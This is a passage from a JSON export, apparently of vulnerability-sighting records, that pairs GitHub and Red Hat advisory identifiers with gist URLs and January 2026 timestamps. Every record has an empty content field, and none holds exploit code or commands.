"1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5hvc-6wx8-mvv4", "type": "seen", "source": "https://gist.github.com/alon710/d56b28668cdd20484371c6f8fddc472f", "content": "", "creation_timestamp": "2026-01-24T21:26:22.000000Z"}, {"uuid": "fb280b5c-3367-4da4-b687-8d457cceefef", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hcp2-x6j4-29j7", "type": "seen", "source": "https://gist.github.com/alon710/e3ec186ce8b74384cab686a3c957fefe", "content": "", "creation_timestamp": "2026-01-24T21:25:36.000000Z"}, {"uuid": "18403086-0eef-4b60-b39d-24f7a8a49255", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3fm2-xfq7-7778", "type": "seen", "source": "https://gist.github.com/alon710/d73ab60e6a5b0c429d12ed3f16361991", "content": "", "creation_timestamp": "2026-01-24T21:25:34.000000Z"}, {"uuid": "830967f2-311a-4e1b-bd31-43962cbe6fd8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mq3p-rrmp-79jg", "type": "seen", "source": "https://gist.github.com/alon710/a0d3268c8592e922002e3790b6f213ca", "content": "", "creation_timestamp": "2026-01-24T21:25:31.000000Z"}, {"uuid": "f4b192bd-0e63-4a63-8cc5-1c917a4807e8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mr7q-c9w9-wh4h", "type": "seen", "source": "https://gist.github.com/alon710/075f469985ff370437f0ec2cae3d97ec", "content": "", "creation_timestamp": "2026-01-24T21:25:30.000000Z"}, {"uuid": "0f8ca623-d8bb-4ff8-bf32-7e9b19e057fc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v4pr-fm98-w9pg", "type": "seen", "source": "https://gist.github.com/alon710/be4d1283d126d357f07086861c16a4af", "content": "", "creation_timestamp": "2026-01-24T21:26:51.000000Z"}, {"uuid": "5e6b3695-1e1a-4bc7-b654-be1543d1d78e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jrmj-c5cx-3cw6", "type": "seen", "source": "https://gist.github.com/alon710/755e1f2877e39f7ef6631c28f89e9add", "content": "", "creation_timestamp": "2026-01-24T21:26:06.000000Z"}, {"uuid": "f3e7e181-1acd-44d8-ae50-729a6ddb4d1c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2026:0384", "type": "seen", "source": "https://gist.github.com/alon710/d7f08bcd33b6c370d97dd604754351e7", "content": "", "creation_timestamp": "2026-01-24T21:25:55.000000Z"}, {"uuid": "9115ebc0-6c04-48e8-9033-65207f266e21", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-f67f-6cw9-8mq4", "type": "seen", "source": "https://gist.github.com/alon710/6174585c403fa327f20d6d102b0463be", "content": "", "creation_timestamp": "2026-01-24T21:25:28.000000Z"}, {"uuid": "b631351d-687a-4bc7-b597-617cf66a67bb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w757-4qv9-mghp", "type": "seen", "source": "https://gist.github.com/alon710/7c756f1cba665f9949e4c513b9fa5426", "content": "", "creation_timestamp": "2026-01-24T21:25:25.000000Z"}, {"uuid": "e5a57f46-9dfa-43e3-9482-aa916fa64235", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-ffj4-jq7m-9g6v", "type": "seen", "source": "https://gist.github.com/alon710/1704fe210c52be7ed4098a296bff9e33", "content": "", "creation_timestamp": "2026-01-24T21:25:24.000000Z"}, {"uuid": "67383b91-c31f-4285-8aaa-c50379d649ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7vp9-x248-9vr9", "type": "seen", "source": "https://gist.github.com/alon710/489e5a6b951d76340463347e8b883bc0", "content": "", "creation_timestamp": "2026-01-24T21:25:23.000000Z"}, {"uuid": "54006ffe-e890-471c-ab68-6fb00dc7c23f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-c83v-7274-4vgp", "type": "seen", "source": "https://gist.github.com/alon710/93857e0f798bd28ac741eb2918b40a7c", "content": "", "creation_timestamp": "2026-01-24T21:25:21.000000Z"}, {"uuid": "c2fbd315-5d04-4063-8550-558146fe8604", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3vhc-576x-3qv4", "type": "seen", "source": "https://gist.github.com/alon710/952db02fd3526f4364556f6d55d1ba79", "content": "", "creation_timestamp": "2026-01-24T21:25:19.000000Z"}, {"uuid": "2a1817f7-20a5-46cd-95bd-41ddeefd22ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-58pv-8j8x-9vj2", "type": "seen", "source": "https://gist.github.com/alon710/1a5ec4fe5dd0ed44a064be50c9dca64e", "content": "", "creation_timestamp": "2026-01-24T21:25:18.000000Z"}, {"uuid": "3f9243f7-865b-49f5-bf0d-389da5f247eb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-g5gc-h5hp-555f", "type": "seen", "source": "https://gist.github.com/alon710/36dfb2017bc84d12c53f0d34b22f1f3f", "content": "", "creation_timestamp": "2026-01-24T21:25:13.000000Z"}, {"uuid": "9c543cc9-f4ae-4d62-8672-206e929c10f1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-q5f6-qxm2-mcqm", "type": "seen", "source": "https://gist.github.com/alon710/9d9c15020305bb7e2d3e52c842759649", "content": "", "creation_timestamp": "2026-01-24T21:25:12.000000Z"}, {"uuid": "7c0f58a2-1e9b-47f2-bd3b-34bae8c260f2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-vxw4-wv6m-9hhh", "type": "seen", "source": "https://gist.github.com/alon710/aa8ca3f229853e03b4f1c286127fcc6f", "content": "", "creation_timestamp": "2026-01-24T21:25:11.000000Z"}, {"uuid": "5f334cd8-e6e8-4df7-a7d5-64bf9d9b6abb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jm5j-jfrm-hm23", "type": "seen", "source": "https://gist.github.com/alon710/4968f5e4fb94574b574d17d9086223a0", "content": "", "creation_timestamp": "2026-01-24T21:25:10.000000Z"}, {"uuid": "11ecd2d2-3ec1-4e27-beb2-5977e97377f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6pw3-h7xf-x4gp", "type": "seen", "source": "https://gist.github.com/alon710/f05df8863d4316e4f7a003f62735ffa6", "content": "", "creation_timestamp": "2026-01-24T21:25:05.000000Z"}, {"uuid": "608732b9-f056-487f-ba4f-9ab38a787c6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3g2f-4rjg-9385", "type": "seen", "source": "https://gist.github.com/alon710/6415b2515d3828512026474d72b46a73", "content": "", "creation_timestamp": "2026-01-24T21:25:03.000000Z"}, {"uuid": "54c47896-037a-44d4-9331-df30f27b2bb7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-73RR-HH4G-FPGX", "type": "seen", "source": "https://gist.github.com/alon710/b9965445400d741d9cbe1ef1ede103a2", "content": "", "creation_timestamp": "2026-01-24T21:25:01.000000Z"}, {"uuid": "dc339130-1c57-41d7-adef-26a5261866b3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-mqqf-5wvp-8fh8", "type": "seen", "source": "https://gist.github.com/alon710/0e639b60b9914f875a66d4ad0cc5ce14", "content": "", "creation_timestamp": "2026-01-24T21:25:00.000000Z"}, {"uuid": "57ceeb89-3943-43ba-8b89-6dd1930c3dda", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-qf5v-rp47-55gg", "type": "seen", "source": "https://gist.github.com/alon710/2fd20a5f9307015a70cb6d5f894dfd78", "content": "", "creation_timestamp": "2026-01-24T21:24:49.000000Z"}, {"uuid": "6ed4abf6-9e24-4267-ab84-da4d4df9fe77", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9583-h5hc-x8cw", "type": "seen", "source": "https://gist.github.com/alon710/8606039e3384db9fdb583be856746a8f", "content": "", "creation_timestamp": "2026-01-24T21:24:48.000000Z"}, {"uuid": "60a5fc0f-6004-4a93-a19b-3f8e6c84b8b8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rvjx-cfjh-5mc9", "type": "seen", "source": "https://gist.github.com/alon710/da6bb8e577db094a3a416473defeda29", "content": "", "creation_timestamp": "2026-01-24T21:26:47.000000Z"}, {"uuid": "bf2535d9-e05e-4aa7-933d-43507e92132a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-J965-2QGJ-VJMQ", "type": "seen", "source": "https://gist.github.com/alon710/71e49ec9290d9b00944b1f116ed36afd", "content": "", "creation_timestamp": "2026-01-24T21:26:35.000000Z"}, {"uuid": "b7ec6fd3-d60c-4286-9f6d-83fd11b55fd3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7hf5-mc28-xmcv", "type": "seen", "source": "https://gist.github.com/alon710/d43c2ffc2927a63a7bed5d25559e0910", "content": "", "creation_timestamp": "2026-01-24T21:24:53.000000Z"}, {"uuid": "1a0e1a75-5476-4722-a0ba-902bf5f6be15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v492-6xx2-p57g", "type": "seen", "source": "https://gist.github.com/alon710/18bb6ffa66139768c806e4c9482f892e", "content": "", "creation_timestamp": "2026-01-24T21:24:52.000000Z"}, {"uuid": "9e892ede-7418-4375-a17e-f3d6423ff132", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hcrc-79hj-m3qh", "type": "seen", "source": "https://gist.github.com/alon710/ebc4c8f6e728f6343eba07aa950a7550", "content": "", "creation_timestamp": "2026-01-24T21:24:46.000000Z"}, {"uuid": "9f100fdf-42e8-418a-80c1-d6bbb739fafe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-hmp7-x699-cvhq", "type": "seen", "source": "https://gist.github.com/alon710/35916d593408cec9703320650f2f775f", "content": "", "creation_timestamp": "2026-01-24T21:26:44.000000Z"}, {"uuid": "5876eb0a-d5f7-472a-81c1-8fdb830cfa95", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x489-xx2m-vc43", "type": "seen", "source": "https://gist.github.com/alon710/63fa2f1b8363f1b0421ae7bb4a3d42bc", "content": "", "creation_timestamp": "2026-01-24T22:43:32.000000Z"}, {"uuid": "c922b072-2932-4c52-9ec4-ac2b8573da03", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JMR4-P576-V565", "type": "seen", "source": "https://gist.github.com/alon710/0ae3438b83af1f6dc50fe382f034b3e9", "content": "", "creation_timestamp": "2026-01-24T22:43:18.000000Z"}, {"uuid": "78006fcf-d0a6-44d6-8be2-f1788eaf30f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-78H3-63C4-5FQC", "type": "seen", "source": "https://gist.github.com/alon710/740963a93e9d48a0c9b60c3a97cdab61", "content": "", "creation_timestamp": "2026-01-24T22:41:49.000000Z"}, {"uuid": "d641b653-58dc-493c-ae54-b12a4d0718dd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-w3g8-fp6j-wvqw", "type": "seen", "source": "https://gist.github.com/alon710/3f4010e608e61e1293cb947f3127fe7b", "content": "", "creation_timestamp": "2026-01-24T22:41:48.000000Z"}, {"uuid": "7cf4d854-1e56-4603-8d11-a331a5a37d0c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4XC4-762W-M6CG", "type": "seen", "source": "https://gist.github.com/alon710/c1dd83acfb6edf3d93e63e6e43deaba5", "content": "", "creation_timestamp": "2026-01-24T22:41:32.000000Z"}, {"uuid": "fed1eb0c-a82d-4728-abb3-91e4d8ae2c82", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PCWC-3FW3-8CQV", "type": "seen", "source": "https://gist.github.com/alon710/8cfd6e8976db6f17c0d6f12363813bd1", "content": "", "creation_timestamp": "2026-01-24T22:41:29.000000Z"}, {"uuid": "8fd0fbba-b345-49be-92fe-03acd44e00f8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5hvc-6wx8-mvv4", "type": "seen", "source": "https://gist.github.com/alon710/ac650bf856a637dbe3b35d65c09adecb", "content": "", "creation_timestamp": "2026-01-24T22:41:44.000000Z"}, {"uuid": "c3765126-334a-4bab-85af-8e03c68ecae7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p523-jq9w-64x9", "type": "seen", "source": "https://gist.github.com/alon710/cb7bc0f43c1c89866a783a66ede14e44", "content": "", "creation_timestamp": "2026-01-24T22:41:43.000000Z"}, {"uuid": "d3bae2d1-8164-49b0-8d7e-69370f6b5235", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-wvpq-h33f-8rp6", "type": "seen", "source": "https://gist.github.com/alon710/cdd55c5ef1010eed6c30711e4e14b80a", "content": "", "creation_timestamp": "2026-01-24T22:41:41.000000Z"}, {"uuid": "d24aa91f-a21b-4dfd-96a7-fde190300d2b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-585Q-CM62-757J", "type": "seen", "source": "https://gist.github.com/alon710/b0966d243dfb60edf1b5fec0c054cba1", "content": "", "creation_timestamp": "2026-01-24T22:41:34.000000Z"}, {"uuid": "fbac7e0f-3112-4744-b16e-da1152b903d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4f6g-68pf-7vhv", "type": "seen", "source": "https://gist.github.com/alon710/029b197c92e3294240c6e6f5978de932", "content": "", "creation_timestamp": "2026-01-24T22:41:33.000000Z"}, {"uuid": "6577318e-6652-4725-87be-c7649a19a1fb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-88q6-jcjg-hvmw", "type": "seen", "source": "https://gist.github.com/alon710/fab06b790e5bed5ee89dbd55bbf43334", "content": "", "creation_timestamp": "2026-01-24T22:41:31.000000Z"}, {"uuid": "53d00547-1b82-4a15-ab28-f42826954435", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-v9qv-c7wm-wgpx", "type": "seen", "source": "https://gist.github.com/alon710/c80e70a12cfb6bfb0765589727871962", "content": "", "creation_timestamp": "2026-01-24T22:44:04.000000Z"}, {"uuid": "65b1275e-740b-4464-9fcf-200d4a9917ff", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-jrmj-c5cx-3cw6", "type": "seen", "source": "https://gist.github.com/alon710/36be3d48452d221b23875ea5d9fc8753", "content": "", "creation_timestamp": "2026-01-24T22:41:28.000000Z"}, {"uuid": "c9fc9c50-3034-4777-8d10-b5633b18811b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2g22-wg49-fgv5", "type": "seen", "source": "https://gist.github.com/alon710/3babd059f8f3d08b2638e0aaf79beaa0", "content": "", "creation_timestamp": "2026-01-24T22:41:27.000000Z"}, {"uuid": "007d4624-654c-4e24-b06d-65235fe5c9a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-637h-ch24-xp9m", "type": "seen", "source": "https://gist.github.com/alon710/ac0cc36f1e01a52052227d37697cbd1c", "content": "", "creation_timestamp": "2026-01-24T22:41:26.000000Z"}, {"uuid": "ee237c57-ca11-4e21-a3a4-e5fcc8320a34", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fcmm-54jp-7vf6", "type": "seen", "source": "https://gist.github.com/alon710/efbde61109747741050261b3551d59be", "content": "", "creation_timestamp": "2026-01-24T22:43:05.000000Z"}, {"uuid": "c1bd261b-36ad-472b-a9d2-1de1487f5cbb", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4f6g-68pf-7vhv", "type": "seen", "source": "https://gist.github.com/alon710/2fddc4f8f5920b41c04424c62ed645fa", "content": "", "creation_timestamp": "2026-01-24T22:41:24.000000Z"}, {"uuid": "772bafe0-77e4-4c5e-841e-1ad5e4ab4670", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-pxj6-p3c4-8w6r", "type": "seen", "source": "https://gist.github.com/alon710/a770658fe8b0c1bcb8b20445fb4b5269", "content": "", "creation_timestamp": "2026-01-24T22:44:29.000000Z"}, {"uuid": "3748ff5d-8f71-4dc5-beae-23192234c46a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-rwc2-f344-q6w6", "type": "seen", "source": "https://gist.github.com/alon710/1b374eaf78dadda1b4eab4b9c4ec88f1", "content": "", "creation_timestamp": "2026-01-24T22:44:27.000000Z"}, {"uuid": "5bf0605e-c2ea-45ed-ad6c-1bb11a1edbee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gjv4-ghm7-q58q", "type": "seen", "source": "https://gist.github.com/alon710/b41e9ce920f76605f0586680ac424910", "content": "", "creation_timestamp": "2026-01-24T22:44:15.000000Z"}, {"uuid": "939b8b08-d27e-45f1-9207-cb45d7d97a33", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p8p7-x288-28g6", "type": "seen", "source": "https://gist.github.com/alon710/752bb6a9d2a978479ab10606f8ba0dca", "content": "", "creation_timestamp": "2026-01-24T22:44:09.000000Z"}, {"uuid": "d0dbe4da-3842-49c4-902b-4a8a8aa29c6d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-529f-9qwm-9628", "type": "seen", "source": "https://gist.github.com/alon710/d298a5a87b77513c2efac1247ffd11a1", "content": "", "creation_timestamp": "2026-01-24T22:43:10.000000Z"}, {"uuid": "d38f3140-a447-4c50-90bb-4e1bc7a4d46d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6mp4-q625-mxjp", "type": "seen", "source": "https://gist.github.com/alon710/cb59689ad3a6bcb6859c8207cb6cdfac", "content": "", "creation_timestamp": "2026-01-24T22:44:07.000000Z"}, {"uuid": "cb08c67c-3b32-465a-be6e-0d0af5c42eaf", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9cg9-4h4f-j6fg", "type": "seen", "source": "https://gist.github.com/alon710/f06caf361188a02ddb88b85ace92cccf", "content": "", "creation_timestamp": "2026-01-24T22:44:01.000000Z"}, {"uuid": "8e924c69-e250-4697-8370-4a5fb55582d1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-84R2-JW7C-4R5Q", "type": "seen", "source": "https://gist.github.com/alon710/4388a05a74d07006b58bfa49d1a515eb", "content": "", "creation_timestamp": "2026-01-24T22:43:11.000000Z"}, {"uuid": "2ea572a2-cff0-4938-b02d-0460b73ad0ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-4C5F-9MJ4-M247", "type": "seen", "source": "https://gist.github.com/alon710/7a15c419f362924b206b2bfb4e18c6e5", "content": "", "creation_timestamp": "2026-01-24T22:43:03.000000Z"}, {"uuid": "cbf0dcf3-ff61-4189-8e96-99128bb9b8b6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-46h3-79wf-xr6c", "type": "seen", "source": "https://gist.github.com/alon710/7ee39f6ec122b47c7e999fe10f8862fd", "content": "", "creation_timestamp": "2026-01-24T22:43:57.000000Z"}, {"uuid": "e88de665-f9d7-48f7-b703-0ea27beb095a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-62r4-hw23-cc8v", "type": "seen", "source": "https://gist.github.com/alon710/5b476988f99b29bca643a5fed5e4789e", "content": "", "creation_timestamp": "2026-01-24T22:43:55.000000Z"}, {"uuid": "282595f7-316d-429a-83ae-5e7b40c7073e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p46v-f2x8-qp98", "type": "seen", "source": "https://gist.github.com/alon710/5debb65c6fcb5d8d12a92cff336d80a2", "content": "", "creation_timestamp": "2026-01-24T22:43:54.000000Z"}, {"uuid": "d7855ee5-df90-4cae-a06c-6972287e22fd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C3G4-W6CV-6V7H", "type": "seen", "source": "https://gist.github.com/alon710/931df119c0c7aff054207b175ce833b5", "content": "", "creation_timestamp": "2026-01-24T22:43:47.000000Z"}, {"uuid": "b057151d-428e-46ae-8d5b-6c6c1330f14a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-93jc-vqqc-vvvh", "type": "seen", "source": "https://gist.github.com/alon710/6501c8539c40a0328e1078dd36ece516", "content": "", "creation_timestamp": "2026-01-24T22:43:43.000000Z"}, {"uuid": "c6ef6a74-7dc2-4f6b-a059-1ed38daabb51", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fpf5-w967-rr2m", "type": "seen", "source": "https://gist.github.com/alon710/1a1e3e884ddf0092d23d25d89f05f39b", "content": "", "creation_timestamp": "2026-01-24T22:43:42.000000Z"}, {"uuid": "e92bdfed-02b6-4443-a33a-64ffa7ba63a7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7rqc-ff8m-7j23", "type": "seen", "source": "https://gist.github.com/alon710/699013fd72e6597230060cac6d864265", "content": "", "creation_timestamp": "2026-01-24T22:43:41.000000Z"}, {"uuid": "f09e2973-51bc-4fdd-9aa3-38e9a9808be9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-fcmm-54jp-7vf6", "type": "seen", "source": "https://gist.github.com/alon710/c2312e669de51117cddb6fb7c6d3231c", "content": "", "creation_timestamp": "2026-01-24T22:43:06.000000Z"}, {"uuid": "c27e2eda-9881-4298-8b3b-9daa88b75d09", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-x7v4-p4g4-f7v7", "type": "seen", "source": "https://gist.github.com/alon710/65d6df2ffba06917264d834b93896938", "content": "", "creation_timestamp": "2026-01-24T22:43:36.000000Z"}, {"uuid": "e639f170-2613-45f6-ab69-982aca16675b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-gvq6-hvvp-h34h", "type": "seen", "source": "https://gist.github.com/alon710/ba3e09576fab94743e09cd5958c53dc4", "content": "", "creation_timestamp": "2026-01-24T22:43:33.000000Z"}, {"uuid": "0cd7470a-b51a-4329-b383-3eaddfd4e8e9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-p4f6-h8jj-vfvf", "type": "seen", "source": "https://gist.github.com/alon710/f12368cd9ac8921898d83077e1553626", "content": "", "creation_timestamp": "2026-01-24T22:43:31.000000Z"}, {"uuid": "c51e38f1-5e81-4b46-ab95-d4afe2e319ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-6h7w-v2xr-mqvw", "type": "seen", "source": "https://gist.github.com/alon710/176ab69e91c63cd6d6fe99d2408d05db", "content": "", "creation_timestamp": "2026-01-24T22:43:30.000000Z"}, {"uuid": "b34900cc-a495-4e72-9e62-9b580c755475", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-528q-4pgm-wvg2", "type": "seen", "source": "https://gist.github.com/alon710/36626992c0ce784e8077bcd0506af6a7", "content": "", "creation_timestamp": "2026-01-24T22:43:15.000000Z"}, 